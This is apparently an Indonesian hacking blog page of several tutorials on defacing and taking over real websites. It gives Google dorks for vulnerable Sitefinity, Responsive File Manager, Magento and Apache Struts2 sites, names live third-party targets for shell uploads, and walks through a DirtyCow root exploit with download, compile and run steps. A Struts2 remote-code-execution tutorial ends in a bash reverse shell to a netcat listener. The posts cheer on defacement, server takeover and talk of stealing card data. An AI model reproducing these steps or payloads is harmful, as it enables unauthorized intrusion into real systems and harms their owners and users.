Codes Xploit: Web Hacking
Showing posts with label Web Hacking. Show all posts
Showing posts with label Web Hacking. Show all posts

Deface CMS Sitefinity Editor Dialogs Shell Upload

Al-Fath

Deface CMS Sitefinity Editor Dialogs Shell Upload
Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
Live Demo : http://www.calstart.org/
Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
TUtor :
Tambahin Exploit Target http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Lalu Pilih Shell lu :)
Sukses Akan Seperti ini :)


Lalu lansung akses shell nyaaa,,,


Sekian & Terimah kasih :) oh, ya jangan lupa follow IG baru gw wkwkwk
https://www.instagram.com/m.daffanajwan/ 
Yang baik tambahin followers gw :v

Tutorial Rooting Server with dirtycow

Yo Wazzap gaes :'v w kali ini mao bagiin tutorial rooting server
mungkin udah bnyk yang tau :'v tapi share aja deh :'v
oh iya sebelum itu baca dulu nih :)
http://familyattackcyber.blogspot.co.id/2017/07/tutorial-back-connect-without-port.html
ok sedikit penjelasan tentang rooting :'v root adalah sebuah proses untuk mengizinkan pengguna ponsel pintar, tablet, dan piranti lain untuk mendapatkan akses tertinggi
yaudah gk usah banyak cincong kuy lach langsung ke kamar :* 

Bahan:

1.Netcat (download disini gan)
2.ngrok (ikeh)
3.localroot dirtycow (yamete kudasai)
4.shell kernel 2016 /2015/2014 kebawah
ok lanjut ke tutorial

Tutorial 

pertama kita lakukan back connect dlu :) 
kita ketikkan ke ngrok nya 
ngrok.exe tcp 123 abis itu ke netcatnya
nc -lnvp 123 
nah ke shell nya isikan server ip sama portnya :) 
SS1yang kedua adalah kita panggil exploitnya dengan mengetik 
wget link localroot yang tadi :) 
SS2
selanjutnya kita compile exploitnya dengan mengetik 
gcc -pthread dirty.c -o dirty -lcrypt
SS3
dan yang selanjut nya adalah kita chmod exploit yang tadi di compile dengan mengetik
chmod +x dirty
SS4

abis itu kita jalankan exploitnya :) 
./dirty dan masukan pasword baru :) 
SS5












nah kita tunggu :) klo udah selesai seperti ss dibawah ini :''v 

SS6

abis itu cek udah ke root apa blom dengan mengetik id firefart
SS7

klo udah ke root abis itu kita anuin tty nya :''v dengan mengetik 
python -c 'import pty;pty.spawn("/bin/sh")' 
abis itu kita login pake command ssh 
ssh firefart@localhost 
trus ketik "yes" 
abis itu masukin password kalian :) 
SS8












kurang lebih seperti di ss :) 
done kita berhasil Rooting :) skarang bebas deh lo mau mass apa ambil vpsnya wkwkwkwkwkwk :'v 
vidionya gan (https://www.youtube.com/watch?v=qIJbI-dZYVg) *ini bukan vidio gua
klo ada kesalahan maaf ya ^_^ maklum gan masih newbie :) 
add fb gue >:( fb gue ( sakata gintoki
ok sekian tenkyuh gan :)


SQL Injections - Innovins

SQL Injections
SQL Injections - Innovins
===============================================================
Gw Anggap lu udah paham dengan SQL Injections
=====
Dork : intext:"Developed by - Innovins" .php?id=
Fresh Mirror baru 2 gw submit hehehe :)
Yo Silahkan Hajar ^_^
Join Grub juga : Join Here!!! & Sukai Fanspage kami di kanan pojok

Deface Dengan Responsive File Manager

kali ini gua bakal share cara deface dengan responsive file manager :''v
teknik ini cukup simpel karena cuman upload file trus akses shell :'''v
ok langsung saja
bahan :
dork:
plugins/filemanager/uploads/
tinymce/filemanager/uploads
jquery/filemanager/uploads
*kembangin gaes
shell ext .php.fla .php5 dll
contoh:eue.php.fla
Live target : http://tesda11.com/414c0a42459163bf6a993bd016b5aeb1/js/jscripts/tinymce/plugins/filemanager/dialog.php

Tutorial:

pertama tama kalean Dorking di google :''v klo udah dapet targetnya exploit dengan dialog.php
contoh:
site.com/path/filemanager/dialog.php
SS1












trus abis itu pencet bagian upload
SS2












abis itu upload shell klean :)
SS3












 XoXoXoXoXo mudah kan ?
SS4
akses shell ? site.com/path/filemanager/uploads/shell klean :''v
ok itu aja dari gue hehehehehe klo ada salah komen ya gan :)
oh iya jangan lupa Like FP kami ya :*

Deface Magento Add Admin


Magento Add Admin

Deface Magento Add Admin
Ok Guys, Sorry gw baru Share tadi agak sibuk jadi sekarang gw share sebelum tidur hehehe
Sebelum itu Download Bahan Dulu -> Download !!!
Dork : inurl:costumer/login
"Powered By Magento"
*Kembangin lagi , atau lu cari dork di blog" lain :)
Step:
Download tuh aplikas lalu buka & isi username dan password contoh daffa123 (isidenganbebas)
dan isi dengan target.

SS1
Lalu Klik Scan, Jika berhasil akan seperti ini :)

SS2
Tinggal Login , untuk login tambahin /admin/ di belakang target contoh target.com/admin/

SS3
Next nanti akan kasih tahu cara pasang shell , ngelog cc , & mendapatkan dollar paypal dari magento
Insyaallah , tapi itu gk gw tepati juga ya hahahaha :)

Tutorial Remote Code Exploit (Apache Struts2)

Cara Deface Dengan Apache Sruts2 ( Remote Code Execution)

yo apa kabar gaes :''v gue admin baru nih hehehe kali ini gue bakal share tutor tentang 
Apache struts2 Remote Code Execution
sedikit info tentang Remote Code Execution ini Remote Code execution adalah sebuah vulnrability yang memungkinkan si attacker untuk memberikan code code berbahaya seperti namanya Remote Code kita bisa meremote kode kode tersebut lalu mengirimnya ke web target 
yodah gk usah banyak cocot lagi :'v 
Yup Langsung saja
Bahan : 
Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python <- disini gaes 
jexboss <- disini gaes 
netcat <-  disini gaes 

Langsung Ke tutor

1.Buka CMD lalu ke folder jexboss nya

2.yang ke dua ketikkan 
python jexboss.py -u http://targetklean.com 
klo vuln ada bacaan vulnerable trus ketik yes


3.sekarang kita coba reverse shell
Buka Netcat nya trus ketikkan
nc -lnvp 123















habis itu ke jexbossnya yang berhasil kita exploit
4.ketikkan /bin/bash -i > /dev/tcp/ip/port 0>&1 2>&1\n
note: klo port mu blom di forward coba pakai ngrok















Klo port blom di forward cek tutor disini gaes Tutorial back conect with Ngrok (disni)

Done udah kita berhasil reverse shell tinggal di anuin

Vidionya Gaes : disini gaes 

klo hoki sih bisa di root :''v